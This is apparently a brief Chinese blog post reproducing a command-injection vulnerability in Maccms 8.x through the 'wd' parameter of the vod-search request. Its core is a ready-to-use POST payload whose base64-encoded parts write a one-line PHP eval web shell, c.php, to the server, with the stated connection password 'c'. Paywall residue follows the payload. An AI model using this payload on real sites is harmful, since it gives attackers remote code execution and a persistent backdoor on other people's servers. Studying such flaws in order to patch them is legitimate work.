描述
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
复现
1.访问web页面

2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包
构造一句话木马payload:
wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}


3.进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。

最低0.47元/天 解锁文章
2544

被折叠的 条评论
为什么被折叠?



